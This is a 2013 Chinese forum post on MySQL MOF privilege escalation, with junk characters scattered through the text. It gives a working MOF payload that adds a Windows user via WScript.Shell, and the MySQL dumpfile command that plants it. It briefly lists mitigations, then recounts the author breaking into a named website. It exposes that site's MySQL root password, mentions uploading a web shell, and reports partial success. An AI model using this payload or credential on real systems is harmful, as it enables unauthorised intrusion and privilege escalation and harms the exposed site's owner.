Mysql mof扩展漏洞防范方法" i3 ]7 Z8 j4 D4 d; }) T
9 v4 Y) r- i* B) Z" X+ m6 z1 \
网上公开的一些利用代码:5 o- A$ Z4 u( w) l- `' b! t9 H8 N
* C. t, G& r# b#pragma namespace(“\\\\.\\root\\subscription”)7 }! _9 n9 I" |+ D- ~# p% T& c( |% K- N
" b( [3 R6 A. Z0 ^instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
3 b9 R$ G- t5 F3 J x( j" F
1 [3 ^$ T" b; }) a. v6 Q0 K & j2 n6 |+ Q, B" @1 E% t
8 K# l7 }+ ?; N
' v% y e4 h1 q, X4 u7 E: F Q( v' T, D
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
! K. g; {$ {" I s, e/ F2 w( a从上面代码来看得出解决办法:
' [ { [* S$ x# S; a5 L! k
5 B& p0 ?$ ]/ O) B: n1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数! z! @; C, D* q5 ^
6 r0 @- n; `7 `- j# a- ?2、禁止使用”WScript.Shel”组件' X6 e( ^. C9 \* A
$ M! y* i5 J+ w4 o s( f: F
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER. d. i4 t9 s- G/ J
% [# B! J# A ]当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下: ~5 w8 i; ~ S" h/ ?4 D% w
5 u5 A2 K" I6 w3 F) d事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权; Z* A. B' x+ m9 t
. z+ z u' _( w8 p! p5 w但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
, `: e: d2 r: C& u, ^: p' F0 o5 T$ t1 q5 X |0 o
看懂了后就开始练手吧! F5 {) ^5 ]; g0 ~
$ E* Y- q5 N3 R. |http://www.webbmw.com/config/config_ucenter.php 一句话 a5 R# h6 X% g( |7 g
+ w& q( n' w6 m1 \
$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。; r2 S# k ]: i
0 D8 X; f2 Q8 b# m' P
于是直接用菜刀开搞
z+ t5 w2 B% k" R9 s( S8 @; m U3 _: p5 E' L
上马先$ |2 i+ d- l; o8 D3 r! f* h
: J0 b6 Q* W/ w! Q$ U+ }既然有了那些账号 之类的 于是我们就执行吧…….
, p# h$ T: F | [3 v( _: T! m
7 {6 M4 x$ M- S3 P4 a6 x小小的说下3 M( S7 _8 |' |; W7 M# h1 S' X
: J+ Z. Y7 \% X& h+ R& O
在这里第1次执行未成功 原因未知+ g( t4 X2 w ^9 V2 f$ z
# P& T6 X9 \; g- V
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
2 U0 s/ \0 W. K7 C i1 J# [/ } V2 ^4 y
#pragma namespace(“\\\\.\\root\\subscription”)) C! F& y( `8 \* U" i
( G$ J; Q0 _ |) M5 Xinstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
5 i. b! c0 M% k0 N7 W
! z6 k) T8 [2 M6 K: i我是将文件放到C:\WINDOWS\temp\1.mof/ [: z/ _9 `! ~2 i. G
+ ~9 u3 T+ [ T
所以我们就改下执行的代码 b9 j; I1 ?! t, O( z% x
& y' [' U$ S7 M& zselect load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
0 S7 L. P. v6 A/ U/ Y& ?6 X4 N+ |
% F, L5 _, f3 Z! v2 z4 E- F8 ]& D) v! U* E1 H
2 a/ A& S& H' q! n% \; u但是 你会发现账号还是没有躺在那里。。) ]1 [) ~3 \% R2 v* U
$ x/ ^5 A0 s* l; u# W
于是我就感觉蛋疼
/ j* x$ a7 o1 A
. t1 P, [$ w5 O+ q) n% |就去一个一个去执行 但是执行到第2个 mysql时就成功了………7 D; t1 |. Z; t$ q$ [/ Y# B* n
2 F5 k6 \6 }" x7 ?5 o5 m. I }# `
: {$ c1 P: v. ^; h
& r0 v6 D$ t- \0 y2 i
但是其他库均不成功…
/ a: L6 b0 M5 [1 x! q9 w% F' m6 [; _3 b
我就很费解呀 到底为什么不成功求大牛解答…
0 D6 q0 g( f$ r- J( i. u% P- j' ^ y6 Y) C. B' {* l U
0 e6 y2 u1 Q: |& b. G/ ]! k8 G( `( A5 m! @
|
发表于 2013-1-4 19:49:49
收藏
支持
反对